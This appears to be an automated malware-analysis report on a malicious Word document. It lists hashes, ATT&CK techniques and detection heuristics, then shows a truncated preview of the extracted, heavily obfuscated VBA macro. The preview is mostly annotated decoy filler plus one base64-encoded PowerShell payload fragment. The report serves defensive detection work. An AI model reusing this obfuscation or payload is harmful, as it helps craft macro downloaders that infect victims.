Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbf554b9fb07d7fb…

MALICIOUS

Office (OLE)

212.8 KB · Created: 2019-03-15 14:12:00 · Authoring application: Microsoft Office Word · First seen: 2021-10-04
MD5: 5b5cac99ddee13315f7fd183106b6807 SHA-1: 8b4e5d1004cc868ae0294e92a0d3caea9011ffa5 SHA-256: bbf554b9fb07d7fb4b3bf21b4c53b1769b678d6bd5a3023c62e344b7ecbe07cb
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1566.001 — Phishing: Spearphishing Attachment

The file is a Microsoft Office (Word) document containing VBA macros, including an AutoOpen macro that calls GetObject; together these are strong indicators of malicious intent. The ClamAV detection and the heuristic hits strongly suggest a malicious downloader. No specific malware family could be identified because the VBA code is heavily obfuscated.

Heuristics 6

  • ClamAV: Doc.Malware.Droo-6903173-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Droo-6903173-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The macro module defines an AutoOpen procedure, which Word runs automatically when the document is opened (once macros are enabled).
  • GetObject call high OLE_VBA_GETOBJ
    The macro code calls GetObject, which obtains a reference to an automation (COM) object; in an auto-executing macro this is a common way to reach another application or the shell.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic also covers documents whose macro exists only as p-code, or whose source could not be extracted, so detection does not depend on readable VBA source being available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL label for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53728 bytes
SHA-256: 2e8762b0eeca2b77a3b247cef07d9d15eacd2f09dca11a193a09d9b5c1e25683
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cU1A41_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iAAB4Dx"
' --- Analyst annotation (report review) ---
' IZDBQ4 never assigns its own name, so it produces no meaningful return value.
' Each of the eight If blocks compares two names that are never assigned
' anywhere in this preview, and each branch assigns three names that are never
' read anywhere in this preview. The arithmetic combines integer literals with
' Tan/Oct/Hex/Sqr calls on operands that are likewise never assigned here.
' NOTE(review): this looks like filler/decoy code meant to pad the module and
' obscure the real logic — confirm against the full extracted source (this is
' only the head of macros.bas) that nothing calls IZDBQ4 and that none of these
' names is used elsewhere.
Function IZDBQ4()
   ' Branch 1 of 8: every block below has the same shape (compare, multiply,
   ' long mixed expression, multiply).
   If HUoAQ4A = K1AUwB Then
       AooUUDA = 166657454 * vc1AQQ
       bB4CcAD = HABo1AAQ / 229126659 / 871723279 + 744152178 * 751445714 / 369718703 + (rDADAAZ - Tan(j1UQAAA + 345334324 - 605118741 - Oct(zBDABowB - Hex(908012061) + 176718505 + Oct(867800412))) + (159435008 / Sqr(773988887)))
       jA1AAA = 626271690 * zAAZAA
' End If sits at column 0 while the body is indented; the same uneven layout
' repeats for every block, which is consistent with generated code.
End If
   If iBAwQo = fQUoZxoA Then
       hwADBBUD = 589448533 * RAwxAkAA
       n4ABGck = wA4QDQ1 / 237121252 / 984991603 + 50129568 * 829439565 / 174715579 + (z1UZoAo_ - Tan(JoAoQX + 590588858 - 260975432 - Oct(q_UDB_ - Hex(166904822) + 892765103 + Oct(440703508))) + (208463113 / Sqr(412832560)))
       rw11_AQ = 594016844 * d4_AU_A
End If
   If dAAQAAC = p1BABA1 Then
       XB_BA1 = 804664163 * RQBcBAx
       mGAAAXA = dAD1kx / 261161455 / 418949576 + 256728713 * 28372168 / 979527069 + (lxD4AA - Tan(BkABBAB + 728813671 - 153013062 - Oct(OcwwDxUQ - Hex(718544484) + 409411168 + Oct(555708371))) + (978472189 / Sqr(125232786)))
       zADAAABB = 535168921 * mBcAUkQ
End If
   If RQGAkAAU = ZA1AxXA Then
       mwGBoAA = 553401725 * FBDZwA
       DQBBxo = GAkA4wAD / 559772210 / 461089845 + 661221981 * 689421010 / 796261855 + (foQkCU - Tan(dAxAAB + 899664189 - 200044816 - Oct(w1DAkQoA - Hex(739571070) + 940689061 + Oct(769381057))) + (587394761 / Sqr(417213991)))
       Rwc_Qc = 555473500 * dAB_AQGA
End If
   If iAA11AkB = pUkAAAA1 Then
       vAQXB1_ = 54284777 * U1B4wk1c
       axkXAA = pAAAAB / 767930234 / 864119435 + 840431413 * 233226221 / 431754384 + (DAAAZoQ - Tan(WGADDAGB + 48669113 - 704056661 - Oct(NA_ABA - Hex(837439844) + 345312132 + Oct(273457832))) + (63506446 / Sqr(534676408)))
       WBZQA1A_ = 980893528 * QDZoXAX
End If
   If ZQAAAB = aAAA4x Then
       B_GAZAZ = 189146771 * Nko4Aw
       JAAX_AkU = dAUAAZU / 238704000 / 422465549 + 258105481 * 542824642 / 435685260 + (VA1cDAA - Tan(hBxXBxwG + 761678711 - 261653279 - Oct(zAAwDAA - Hex(804531362) + 410636096 + Oct(432513668))) + (746611890 / Sqr(875684361)))
       RAADoAoQ = 51709270 * PBwX4QXD
End If
   If pXx1ACAA = kAX4QxDA Then
       QAAA_DG1 = 393714294 * mcAGAACD
       ZxBxcQAw = jUA4AkAA / 828860433 / 252002105 + 492418811 * 926866533 / 343564292 + (s_CDGkQ_ - Tan(fZA_BUDD + 5509470 - 55945585 - Oct(GQ14AQA - Hex(452017812) + 564040955 + Oct(686889086))) + (308731958 / Sqr(69954372)))
       RoAQDA = 665116046 * jZA1BUB
End If
   If IAcADc = KAQBDUZA Then
       vooAQBU = 225307081 * YAoA_o1A
       WQUU1kc = fQA4Q_c / 351081868 / 244540235 + 891096719 * 145302277 / 45367667 + (SwQDwk - Tan(CcGcDZZ + 626514729 - 413852199 - Oct(tA1UAkB - Hex(488188406) + 524523816 + Oct(50894717))) + (538390704 / Sqr(611012899)))
       QAAQAA = 924833891 * YDCQkZ
End If
End Function
Function SAAAAGQ()
On Error Resume Next
If qoDwUA1G = sGUQAo Then
       YU_ACX = 287750603 * wZA_UQGo
       tZZcAA = pUAAGUAA / 860658513 / 216377560 + 550350428 * 920997540 / 911945343 + (IDAAUX - Tan(ucAABc + 435878146 - 829466079 - Oct(WZQBQA - Hex(336909773) + 666144889 + Oct(759909822))) + (920899973 / Sqr(447037960)))
       LA1A4_AX = 564272179 * NXCGwCA
End If
   If QA1G_UAZ = zAA4GAo_ Then
       QCoAAC = 501567366 * fDBDGcA
       wAkUkA = RACC1_ / 868780443 / 923753279 + 468127597 * 368909782 / 917221257 + (awckUAA - Tan(iAAoQXX4 + 837310715 - 960978303 - Oct(jDcAAAUA - Hex(217103481) + 629138258 + Oct(12126364))) + (766817359 / Sqr(381239177)))
       G4U1ck = 591079096 * HUAGAo
End If
Y_AA4DUA = "KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAg"
If YADA1A = UQAABkG Then
       cAAUox = 258697236 * tGQQAC
       YwD4UZkA = YAADwc / 73812250 / 188096371 + 299720960 * 431728990 / 794459285 + (FBwXA4B - Tan(PAAAAUB + 414352560 - 121959079
... (truncated)